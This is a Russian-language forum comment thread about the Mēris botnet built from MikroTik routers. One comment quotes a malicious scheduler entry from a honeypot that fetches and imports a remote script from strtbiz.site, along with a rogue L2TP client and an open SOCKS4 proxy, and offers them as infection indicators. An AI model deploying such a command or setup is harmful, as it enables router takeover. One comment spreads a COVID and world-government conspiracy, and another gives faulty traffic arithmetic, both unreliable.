Comments 148
А как читается это латышское название?
Почему бы владельцам заражённых роутеров не выдавать страничку "ваш роутер скомпромитирован". А то пользователи же и не знают даже, что кого-то дедосят.
И владельцам роутеров объяснить, как проверить- заражен он или нет?
Хотя, если MikroTik уведомлен об этом только вчера- решения пока скорее всего нет.
а даже если и есть - у микротиков нет автообновления. Точнее, технически оно есть, но мне неизвестны публичные адреса для этого, там нужно что-то вписывать руками. Так что даже выпустив новую версию, если не заняться информированием обонентов о критическом обновлении, половина всех устройств получит обновление только через несколько лет..
Компания Яндекс посчитала трафик от вашего роутера подозрительным. Мы вас отключаем?
О том и речь, что если Яндекс не мой ISP, то какое дело моему ISP до того какие проблемы я создаю Яндексу (насколько понимаю трафик генерируется не очень большой).
Поэтому, думаю, никакого отключения платящих клиентов не будет.
Айпишники ISPа в блеклисты улетят. Учитывая что сейчас везде динамические IP и NAT его это не обрадует.
Тогда встаёт вопрос - как микротик за натом оказался заражён в первую очередь?
Думаю, сейчас только энтузиасты делают монолитные вирусы, а профессиональные злодеи работают с комплексами. Купить у какого-нибудь другого ботнета возможность запуска нагрузки на компах пользователей - и вот уже есть выход на первые микротики за натами. Достаточно одного, чтобы выйти на остальные в ЛВС провайдера. Несколько стадий заражений и проникновений - вот и собран новый ботнет.
У меня микрот например стоит для выдачи ipv6 (v4 - даёт кинетик), ну и как резерв для в4 если основной пров сломается. Если его заблочит -- я это замечу не раньше чем отвалится основной пров, что бывает раз в год, когда автооплата не прошла.
Какой-то ламерский пров у вас - что мешает ему включить на всех своих портах DHCP Snooping или вообще резать весь исходящий трафик по портам DHCP?
Честно говоря уже давно не встречал провайдеров у которых не было бы защиты от dhcp-серверов. В маленькой организации я такое ещё могу представить, но не у провайдера.
У микротиков автообновление можно реализовать через скрипт и запускать его через планировщик заданий. Пример есть, кажется, на сайте с доками самого микротика. Но действительно это надо ручками, галочку поставить негде. Поэтому в сети до сих пор встречаются устройства с прошивками 5.хх
автообновление реализуется однострочным скриптом
UPD да, глупо было бы предполагать, что это до сих пор никто не написал ;))
А он заражен? Всмысле был взломан через дыру или посаны просто пароль не поставили.
Хорошая мысль, кстати.
А еще стоило бы как то ограничить продажу микротов "домохозяйкам".
Как вы предлагаете определять уровень квалификации покупателя?
По красным глазам и свитеру летом, с оленями.
Никак, я озвучил только свои мысли.
Навороченный прибор в руках хомяков, опасен как бомба. Что и подтверждается практикой.
Keenetic, как производитель роутеров бытового уровня, в прошивках версии 3.x ввел опцию "автообновление ПО". Сдается мне, в Mikrotik нужна такая же, и включенная по дефолту. Профессионалы её смогут отключить, конечно. Если найдут :).
Как быть если конфиг… замысловатый и обновление что-то где то сломает?
кстати а на какую ветку обновляем?
long-term? stable? testing? development?
По умолчанию - stable.
Вы же знаете микрот, если сегодня им отправили, в stable это появится через год
Чем не повод пересесть с микры на что-нибудь поинтереснее и посекьюрнее?
А в чем собственно проблема с Cisco или Juniper? Или даже Palo Alto или Fortinet? Цена кусается? Ну всё правильно - хочешь секьюрность плати. Не хочешь - юзай микру. Линукс - как вариант не плох, но с грамотно настроенным fail2ban. Придётся конечно изрядно попотеть пару ночей чтобы это работало хотя бы на "удовлетворительно", и однозначно придется чем-то пожертвовать в функциональности.
...и тем самым вы "by default" соглашаетесь, что на вашей микроше в любой момент может прописаться зловред. Согласен, микротик может и не плох, если у вас Small-Business и дырявый раутер для вас норм. Но пускать микру в более-менее серьезный Enterprise, где из-за утечки данных есть вероятность пострадать финансово или морально - ну б его нафиг, трижды подумал бы.
П.С. В Сириос Бусинэсс защита обеспечивается не маркой одного устройства, а комплексом оборудования, софта, мер и т.д. Обосраться и слиться можно и с топовой циской, как и послать хакеров с крекерами в null на линуксовой машине с древним ядром.
микрот регулярно факапит на разных этапах. Я пару раз скатался за 200км, потом отключил "автообновление".
Ну, справедливости ради, представляете себе автообновление на Cisco или Juniper?
Проблема микрота не в том, что что падает в процессе обновления. Нет! Проблема в том, что падает то, что не заявлено в патч-нотисах! Например, при входе в раздел "wifi" микрот начинал делать потери пакетов в 50%. Строго на определенной stable прошивке. Как так?! На форуме было разбирательство 1,5 месяца, где люди доказывали что они не верблюды, прежде чем выпустили хот-фикс. Чего тут повторять? открываешь раздел настроек и получаешь кирпич....
Как вы предлагаете определять уровень квалификации покупателя?
Просто продавать устройства без defconf )
Я честно говоря немного понимаю во всем этом, но микротики меня пугают. Тут недавно была статья с базовой настройкой, от которой у меня пропала охота его покупать. Я лучше по-старинке, люликс и iptables. Надеюсь это лучше, чем микротык в моих руках.
На самом деле в микротиках уже давно есть страница быстрой настройки, которая не сложнее того, что есть в тех же длинк.
Статьи про безопасную настройку микротиков на Хабре - это больше для параноиков.
Он не сложней любой cisco.
У меня стоит микрот, я очень доволен его гибкостью.
А еще стоило бы как то ограничить продажу микротов "домохозяйкам".
Вас бешеный принтер покусал?
Я думаю, что все в конечном итоге придет к сертификации и продаже с уймой всякого добра только компаниям. А весь смысл был как раз в организации сетей малого бизнеса, но в малом бизнесе принято всех выкидывать в том числе и админов и вот через какое-то время результат настигает.
Был у меня опыт работы в одной компании где по началу даже файрвол не был включен и ничего люди работали и ничего не боялись. Правда история это не про Microtick.
И выдавать эту страничку на скорости 20-30 млн. запросов в секунду ботам, которые не будут её читать, но будут очень рады, что заставили сервер её сгенерировать? Отличная идея!
Боты, на сколько я понял, не странички грузят. А пользователям странички и так отдаются - просто добавить к ним надпись и ссылку на инструкцию по обезвреживанию.
Атака не повлияла на работу наших сервисов, данные пользователей не пострадали.
Сегодня лежал yandex cloud(было не зайти в админку, 20 минут назад заработал), лежал наш виртуальный сервер на yandex cloud, также у нас свой bid manager ставок для yandex direct и ведется лог ставок рекламных кампаний - с 9 утра на большинстве кампаний в direct показывает нулевые ставки за клик.
У них сегодня с днс проблемы были. Читайте алерты.
Так вот проблемы по какой причине? Продолжалась атака?
А где их можно прочитать? У меня тож седни были проблемы с облаком.
Алиса: нет связи с Интернетом . . .
как интересно - снова микротик в ботнете, а поспрашиваешь знакомых - ни у кого проблем нет.
вам не стыдно такое распространять? давайте лучше циску в таком обвините - примеров можно навалить. так и напишите в заголовке "сервера яндекса под циской участвуют в ддос атаке".
Связана разделегация домена mynetname.net с этой атакой?
У меня неприятные ассоциации... IT-коронавирус? Болезнь и симптомы уже есть, ни носителя ни лекарства (патча) пока нет, никто ничегоне знаети даже не понятно, насколько это серьезно...
А есть ли хэши вредоносных бинарных файлов?
Устройства MikroTik давно в "лидерах" по предоставлению публичных прокси
десятки тыс. socks4 на порту 5678 появились пару месяц назад - из более 150 стран
Сотрудники службы безопасности Яндекса пользовались впс на яндекс.клауде и не пускали админов клауда к панелям, чтобы они не забанили, пока СБ сканит интернет.
И зря! Где это видано, чтобы компании типа яндекса сканировали Интернет? Не положено!
</irony>
Они написали, как: radar.qrator.net
Послушайте. Вот я - не домохозяйка, и могу забраться в свои микротики на предмет поковырять и что-нибудь проверить/отключить.
Но я не настолько их фанат, чтобы знать всю внутреннюю кухню RouterOS, и писать скрипты в командной строке по памяти, мне реально не досуг заниматься её изучением до уровня админа.
Все они у меня настроены без вывихов, максимум отключен Winbox
Я думаю, таких пользователей довольно много.
Поэтому был людейбы рад от людей знающих получить методы проверки наличия этой проблемы, включающий хоть что-нибудь кроме смены пароля.
Обновить сбросить, поставить другие пароли и перенастроить заново ведь может не помочь.
Винбокс в свое время просто отключали.
А что отключить сейчас, коль есть такая проблема?
Кажется ботнет растет за счет zero day уязвимости, и пока не совсем понятно где проблема. Для начала нужно перенести все стандартные порты на другие и закрыть доступ к микротику из вне. Если закруть доступ нельзя тогда сделайте простой port knock для открытия порта. Это минимальные действия что приходят в голову.
не думаю что из-за неправильной настройки получилось подмять под себя 200 000 устройств. Явно есть дырка, давайте подождем ответа от самого микротика
У вас есть на примете уже взломанные устройства? Можете сказать какие есть признаки того что у вас в микротике сидит ботнет Meris? Ну кроме того что открыт порт 5678.
Проверил все свои около 200 микротов на предмет несанкционированного изменения конфигов, не нашёл ни одного.
Но 2 недели назад был на аудите у клиента, ему провайдер развернул WiFi сеть, в роли роутера поставил коммутатор CRS328, без дефолт-конфига, просто прописаны ипы и маскарадинг, всё, остальное пусто, фаер чистый, все службы включены, все доступы открыты, спасибо, хоть прошивку до последней обновил.
Ясное дело, заметил следы взлома:
Загрузка проца 100% (хоть у коммутаторов процы и слабые, но всё же)
Включен SOCKS4
Включен Web-proxy
Разрешены внешние запросы к DNS
Накатывание дефолт конфига, закрытие доступов и отключение SOCKS4, Web-proxy и DNS уронили нагрузку до 5%.
После смены доступов периодически за ним наблюдаю, признаков взлома не появляется. Делаю вывод - все беды из-за рукожопого отношения к работе.
Сейчас кнокать, переназначать и закрывать делу не поможет и смысла в этом нет. Этим надо заниматься когда настраиваешь рутер. Input и Forward из WAN закрыты в defconf, а значит у 95 процентов пользователей. Но они в ботнете. Значит это zero day уязвимость в фаерволе или в обход фаервола? Единственное что сейчас может решить проблему: это update от Mikrotik, остальное бессмысленная имитация деятельности.
Ответ от Микротика по поводу ботнета: https://forum.mikrotik.com/viewtopic.php?f=21&t=178417
Если в двух словах то этот ботнет микротики которые были скомпрометированны в 2018 году и сейчас в микротике нет явных дыр в безопастности RouterOS - это подтвердил независымый аудит.
В данном случае пока побуду Станиславским.
"Атаки ориентированы на эксплуатацию RPS (подтверждено)" - поясните, пожалуйста. В статье не полностью разобрался.
Вот эта статья о ддос вроде тоже ничего не дала, но гораздо лучше обезьян из сбера.
И я кстати ни разу не удивлюсь если окажется, что никакой уязвимости и вовсе нет, а все эти сотни тысяч микротов просто были криво настроены и торчали в интернет голым задом.
Для распространенности нужно учитывать сколько всего там пользователей интеренена в других странах и сколько в процентном отношении любителей микротика.
Например у нас 1000 челокек пользуется интренетом и из них 100 человек купили микротик, итого 10%. Распространенность 10%.
У них 10 000 челокек пользуется интернетом и из них 200 человек сидит с микротиком, это не в два раза больше, это всего 2% против 10%.
Комментарий из сообщества североамериканских операторов связи:
Mikrotik is a very popular router in small to medium ISPs, running, well, everything.
В приведённой таблице не микротики (и вероятно даже не зомби-хосты), а грубо говоря количество точек с активным TCP-listener на 5678 порту, ибо:
Возможно, Mikrotik и Linksys не единственные, но у нас нет другого выбора, кроме как предположить, что 328 723 – это и есть число хостов в активном ботнете.
Например, у меня рутер тоже 5678 портом наружу торчит, но ваш покорный слуга использует его для совершенно других нужд (порт то как бы для RRAC изначально), и у меня не микротик, но меня возможно тоже посчитали.
Странно, что сперва речь шла про комбинацию с портом 2000:
Однако конкретная комбинация порта 2000 с «Bandwidth test server» и порта 5678 с «Mikrotik Neighbor Discovery Protocol» почти не оставляет почвы для сомнений в наших выводах.
Но просканировали почему-то только на предмет открытости TCP 5678:
... мы решили проверить TCP-порт 5678 с помощью Qrator.Radar
А как вы их успеваете заблочить? Чисто из-за пайплайнинга, или что-то ещё есть?
Просто припустим большой ботнет начнет качать index.html. как их отфильтровать от пользователей?
И ещё вопрос, как дела предстоят с http2? Там будет атака хуже/лучше?
Не большой сторонник теорий заговора, но где-то проскакивала новость, что РКН "успешно" протестировал блокировку vpn сервисов. Совпадение?
Кроме того, мы направили всю собранную информацию в профильные организации.
А у этих профильных организаций, под которыми, видимо, понимаются борцы с DDoS-атаками, нет ли какой-нибудь ассоциации для координации усилий? Или каждый считает собранные блэклисты своим конкуретным преимуществом, и с другими в общем случае не делится?
Для тех, кто не понимает, что такое 20MRPS. Если каждый запрос (аммортизированно) - это порядка 200 байт заголовков и запроса, то речь идёт про примерно 40 гигабит осмысленного трафика с запросами на каждый из которых сервера должны ответить. Не пустого флуда, который на сетевом уровне режется на достаточно толстом оборудовании с малыми проблемами, а самого что ни на есть "живого" и напоминающего клиентский.
Вопрос: каким образом был получен график распределения версий RouterOS из статьи?
Каким образом я могу проверить свой роутер на зараженность?
Ответ разработчиков:
В частности, мы предлагаем отключить SOCKS и заглянуть в меню Система -> Планировщик. Отключите все правила, которые вы не можете определить. По умолчанию правил планировщика быть не должно, а SOCKS должен быть выключен.
Проверить:
- system->scheduler на наличие незнакомого плана (у моей honeypot это был план
name="U6"
interval=3m o
n-event=/tool fetch url=http://strtbiz.site/poll/7edc6ee2-154f-47f1-b430-07871f8e9c40
mode=http
dst-path=7wmp0b4s.rsc\r\n/import 7wmp0b4s.rsc
policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive )
- ppp->Interface на наличие незнакомого l2tp-клиента (мой вариант
name="lvpn"
connect-to=s71.leappoach.info
user="user5589762"
password="pass5589762" )
- ip->socks ( enabled: yes
port: 5678
connection-idle-timeout: 2m
max-connections: 200
version: 4
auth-method: none)
Зацепился за слово Mēris, т.к сам из Латвии, открыл статью - а тут такое. Пользую hapac2, как узнать что я не в ботнете? Без ответа не усну :)
На один коммент выше смотрите https://habr.com/ru/company/yandex/blog/577026/comments/#comment_23479818
Открыт TCP 2000, но закрыт TCP 5678
Устройство взломано?
Яндекс недавно стал говорить, при поиске, что мои запросы похожи на автоматические. То ли действительно мой роутер к нему активно долбился, то ли ip попал в базу адресов с открытым 2000, а потому - подозрителен.
Как бы выяснить...
Как опознать что твой микротик взломан? Должны быть открыты порты 5678 и 2000? Если этого нет, значит все в порядке?
20 млн RPS — это самая крупная атака из известных за всю историю интернета.
20 млн запросов в секунду? Я правильно понял? И это самая крупная атака за всю историю интернета?! - Аж как-то смешно... Процессор 1 GHz способен обрабатывать миллиард операций в секунду. А 20 млн, мне кажется это нормальная рабочая нагрузка для поисковой системы, типа Google, а для Яндекса это по всей видимости - подвиг...
Вы сравнили запрос к сервису с базовой операцией на процессоре? :)
Я сравнил вычислительные возможности одного ПК с одной точкой доступа к интернету, с этой "дос.атакой тысячелетия" :) Например длина запроса "привед медвед" = 25 байт. Делим 1024 / 25 = 40,96 запросов в 1KB; Округляем до 41 и умножаем на 1024 = 41984 запросов в 1Мб * 100 = 4 198 400 возможных запросов длиной 25 байт в 100 мегабайтах. Сократите длину запроса до "null" (4 байта) и вы получите где-то 21,8 млн RPS.
Чтоб отправить 100Мб за секунду, нужна скорость интернета до 1 Гигабит и 1 ПК с обычным процессором. Никаких 200 000 устройств для этого не нужно. На сколько я знаю, в некоторых странах уже есть домашний интернет со скоростью 1Гбит/с.
Поисковые системы, такие как Яндекс, Google и др., просто обязаны иметь ширину канала гораздо больше, если они позиционируют себя глобальной поисковой системой.
Я бегло прочитал статью и не увидел время (продолжительность) предполагаемой DDoS-атаки. Возможно это было совпадение, и в какой-то момент в систему поступил 21 миллион реальных запросов. Сегодня интернетом пользуются около 4-х миллиардов людей... Поправьте меня пожалуйста, если я где-то ошибся.
мы в Яндексе собрали данные о 56 000 атакующих устройств
- по моему у вас система просто тупит :)
Ключевая ошибка в том, что вы запросы начали переводить в веса. В этом нет никакого смысла.
Но я по-прежнему надеюсь, что это просто троллинг такой :)
Ключевая ошибка в том, что вы запросы начали переводить в веса.
По вашему электрический сигнал не имеет размерности? Или это кто-то на электростанции игрался рубильником, отправляя нули и единицы на сервера Яндекса, и таким образом сделал досатаку?
Для общего развития:
Сигнал — материальное воплощение сообщения для использования при передаче, переработке и хранении информации.
Но я по-прежнему надеюсь, что это просто троллинг такой :)
По ходу это вы тролите людей своей статьёй. А админы (или хз. кто), делают карму людям XD И в таком случае, всё это танцы с бубном.
У меня есть старый hdd на 500Gb. Могу его сбросить с 5-го этажа.
Получается скорость передачи информации - 500 гигабайт в секунду!
Ребят, не верьте им. Это самый глобальный сговор в истории.
Вот уже Яндекс заговорил о кибератаках. Все по сценарию. Один и тот же фейк со Сбером (читайте новость на хбре недельной даности). Ждите переворот этой осенью.
Напоминаю что 2 месяца назад прошел всемирный киберполигон, на котором те же люди, которые стоят за короновирусом , запланировали кибератаки. Это аналог события 201 (читайте Википедию) на котором за 74 дня до пандемии они говорили о будущей "внезапной" пландемии....
Будет переход на единую цифровую валюту после этого и весь кавидный режим ужесточат!
И похоже не будет доступа к деньгам. Не будет света, интернета несколько дней и будут эвакуации людей в кавид лагеря.
Готовьтесь.
Неделю назад аналогичная кибератака "произошла" на Сбер. Греф, Мишустин, Шваб - участники кибеполигона.
Кто то ещё сомневается во всемирном заговоре элит?
Это самый глобальный фейк развод, ребят. И се с ужасным кавидом это все звенья одной цепи и кусочки одного пазла, кто до сих пор не понимает. Нас всех хотят поиметь этой осенью.
Яндек работает на правительство РФ. Аналгично как гугл работает на правительсво США. Читай на мировое правительство, закулисье.
Всем пора просыпаться.
Когда эта новость появилась - сразу побежал проверять свой микрот на наличие вот этих вот проблем. В итоге всё оказалось хорошо, но проверить никогда не лишне.
Не смотря на явные признаки отношения атаки к микротам, думаю справедливо допустить, что среди ботнетов есть огромное количество и других устройств. Не думаю, что только с микротами неосторожно обращаются, а различные кинетики до 2018 года выпуска тоже сами не обновятся, если им не сказать. Что и говорить, два года назад сам менял в одной бюджетной организации DIR-100 на микрот. Вот смех смехом, а мы думали их хоть какой-то админ обслуживает и меняет оборудование раз в N лет. Так что комментарии о том, что микроты не стоит нигде ставить, на мой взгляд, чистой воды предвзятое отношение. Хотя следует быть внимательным с этим изделием латвийского гения. Нет-нет, да найдётся какой-то небольшой баг, над которым потом голову ломаешь час.
Больше всего интересно, возможно ли определить центральный источник этой атаки? Очевидно, что за всем этим стоят живые люди, которые выявляют уязвимости, совершают взлом, дают распоряжение запустить использование уязвимости, да и нажимают нужную комбинацию клавиш для её запуска. Может быть есть и те, кто разработают методику поиска хотя бы части виновников?
К слову, помнится на хабре читал статью энтузиаста, который находил в интернете и исправлял эту самую уязвимость. Возможно, стоит связаться с ним и им подобным соответствующим инстанциям для помощи в решении проблемы на официальном уровне?
Ботнет Mēris: расследуем крупнейшую DDoS-атаку в истории интернета